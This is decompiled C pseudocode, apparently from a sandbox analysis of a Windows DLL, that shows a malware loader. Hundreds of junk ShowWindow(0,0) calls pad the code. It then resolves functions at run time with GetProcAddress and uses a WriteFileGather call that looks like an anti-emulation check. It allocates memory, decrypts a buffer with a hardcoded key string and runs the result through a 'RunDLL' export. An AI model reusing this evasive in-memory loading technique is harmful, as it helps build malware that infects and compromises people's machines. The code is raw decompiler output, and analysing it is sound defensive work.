				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				_t1284 = _v84;
				if(_v64 < 0x10) {
					_t1284 =  &_v84;
				}
				_push(0x11);
				_t1285 = E10001050(_t1284);
				_t1367 = GetProcAddress;
				_t1378 = _t1377 + 8;
				 *0x1001c460 = GetProcAddress(_v336, _t1285);
				_t1288 = _v56;
				if(_v36 < 0x10) {
					_t1288 =  &_v56;
				}
				_t1289 = GetProcAddress(_v336, _t1288);
				_t1358 =  &_v328;
				_push( &_v328);
				 *0x1001c46c = _t1289;
				_push(3);
				_push( &_v324);
				_push(0x10000000);
				if( *0x1001c460() >= 0) {
					_t1358 =  &_v348;
					 *0x1001c46c(0x10000000, _v344,  &_v348,  &_v356);
				}
				if(WriteFileGather(0, 0, 0, 0, 0) == 0) {
					_t1294 = E10007666();
					_t1296 = VirtualAlloc(0, _v356, _t1294 * E10007666(), "64"); // executed
					_t1367 = _t1296;
					E10006BF0(0, 0x10, _t1296, _t1296, _v348, _v356);
					E10001140(0, 0x10, __eflags, "Hli2W6g#M?#d!+j%)Q&u3drUUqwMWYP8$x^%7L?4x7az_27aeNid!*9Qfq5e7>X5^o7BO?wNv0y$9V$UB0EbW", 0x56,  &_v352);
					E10002330(_t1296, _v356,  &_v352);
					_t1378 = _t1378 + 0x30;
					_t1302 = E100047B0(_t1367, _v356);
					_t1303 = E10004380(); // executed
					 *_t1303(_t1302, "RunDLL", "64", E10007666(), "64");
					_t1358 =  *0x1001b004; // 0x100161c0
					_t1305 = MessageBoxA(0, _t1358, 0, 0);
					__eflags = _v96 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v108);
						_t1378 = _t1378 + 4;
					}
					_v88 = 0xf;
					_v92 = 0;
					_v108 = 0;
					__eflags = _v200 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v220);
						_t1378 = _t1378 + 4;
					}
					_v200 = 0xf;
					_v204 = 0;
					_v220 = 0;
					__eflags = _v116 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v136;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v136);
						_t1378 = _t1378 + 4;
					}
					_v116 = 0xf;
					_v120 = 0;
					_v136 = 0;
					__eflags = _v256 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v276);
						_t1378 = _t1378 + 4;
					}
					_v256 = 0xf;
					_v260 = 0;
					_v276 = 0;
					__eflags = _v172 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v192);
						_t1378 = _t1378 + 4;
					}
					_v172 = 0xf;
					_v176 = 0;
					_v192 = 0;
					__eflags = _v60 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v80;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v80);
						_t1378 = _t1378 + 4;
					}
					_v60 = 0xf;
					_v64 = 0;
					_v80 = 0;
					__eflags = _v144 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v164);
						_t1378 = _t1378 + 4;
					}
					_v144 = 0xf;
					_v148 = 0;
					_v164 = 0;
					__eflags = _v228 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v248);
						_t1378 = _t1378 + 4;
					}
					_v228 = 0xf;
					_v232 = 0;
					_v248 = 0;
					__eflags = _v32 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v52;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v52);
						_t1378 = _t1378 + 4;
					}
				} else {
					_t1388 = _v80 - 0x10;
					if(_v80 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1388, _v100);
						_t1378 = _t1378 + 4;
					}
					_v80 = 0xf;
